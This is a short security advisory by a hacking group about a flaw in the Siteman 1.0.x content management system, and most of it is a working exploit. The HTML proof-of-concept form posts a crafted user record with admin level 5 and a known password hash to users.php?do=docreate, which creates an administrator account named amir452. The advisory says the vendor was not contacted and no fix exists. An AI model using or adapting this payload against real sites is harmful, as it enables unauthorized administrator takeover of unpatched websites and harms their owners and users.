God Admin Injection Vulnerability in Siteman 1.0.x, Discovered by PersianHacker.NET Security Team by amironline452 (amironline452 hotmail com) http://www.PersianHacker.NET http://www.amironline452.tk Siteman is a Content Management System (CMS) that is so easy to install and use, that a person who has no knowledge about creating homepages can get a profesionally looking website up and running in just minutes. More info @ http://sitem.sourceforge.net/ http://sourceforge.net/projects/sitem/ Discussion: With this Vulnerability you can create God Admin user in Siteman v1.0.x. Exploiet: <html> <b>These data were recorded.</b><br /><br /><table cellspacing="0" cellpadding="2"><tr><td>Username(Use this, and not your display name, when logging in)</td><td align="right">amir452</td></tr><tr><td>Password</td><td align="right"><form><select><option>Click to show password</option> <option>amir452</option></select></form></td></tr><tr><td>Secret Question (Asked when you forget your password)</td><td align="right">amir452</td></tr><tr><td>Answer to secret question</td><td align="right"><form> <select> <option>Click to show answer</option> <option>amir452</option> </select></form> </td></tr><tr><td>Display name</td><td align="right">amir452</td></tr><tr><td>Member Level</td><td align="right"><b>5</b> (Admin)</td></tr><tr><td>email</td><td align="right">amir452@xxxxxxxxxxx</td></tr><tr><td>Hide my email adress</td><td align="right">no</td></tr><tr><td>Forum Signature</td><td align="right">hackers</td></table><br /><br />Is this correct?<br /><table cellspacing="0" cellpadding="3"><tr><td> <form action="users.php?do=new" method="post"><input type="submit" value="no" /></form></td><td> <form action="http://www.example.com/users.php?do=docreate"; method="post"> <input type="hidden" name="line" value="amir452|347a9a8a8d3f364f0bdb82c4208a3207|5|amir452@xxxxxxxxxxx|amir452|1105956827|amir452|347a9a8a8d3f364f0bdb82c4208a3207|0|0|0|hackers" /><input type="submit" value="yes" /></form></html> the above exploiet creat God Admin user with folowing info: username: amir452 password: amir452 Note: Script authors not contacted. There is no solution at this time.
